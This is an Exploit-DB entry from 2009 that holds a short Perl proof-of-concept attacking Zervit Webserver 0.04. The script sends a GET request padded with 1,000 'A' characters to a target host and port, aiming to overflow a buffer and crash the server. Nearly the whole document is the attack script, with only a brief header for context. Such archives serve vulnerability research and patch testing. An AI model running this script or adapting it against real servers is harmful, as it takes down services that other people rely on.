Zervit Webserver 0.04 - GET Request Remote Buffer Overflow PoC

2009-05-18T00:00:00
ID EDB-ID:8721
Type exploitdb
Reporter Stack
Modified 2009-05-18T00:00:00

Description

Zervit Webserver 0.04 (GET Request) Remote Buffer Overflow PoC. Dos exploit for windows platform

                                        
                                            #!/usr/bin/perl
# Zervit webserver 0.4 Bof Poc
# make it just for fun :s
use LWP::Simple;
use LWP::UserAgent;
 
if (@ARGV < 2) {
            print("Usage: $0 <url> <port>\n");
            print("TARGETS are\n ");
            print("Example: perl $0 127.0.0.1 777 \n");
            exit(1);
                    }
                    ($target, $port) = @ARGV;
        print("Zervit Webserver 0.04 bof xpl : Coded by Stack!\n");
        print("Attacking $target on port $port!\n");
        print("Ddossing .......\n");
        $dos ="\x41" x 1000 ;
        $temp="/" x 2;
         my $url= "http://". $target. ":" . $port .$temp . $dos;
            $content=get $url;
            print("\n Server Bofed");

# milw0rm.com [2009-05-18]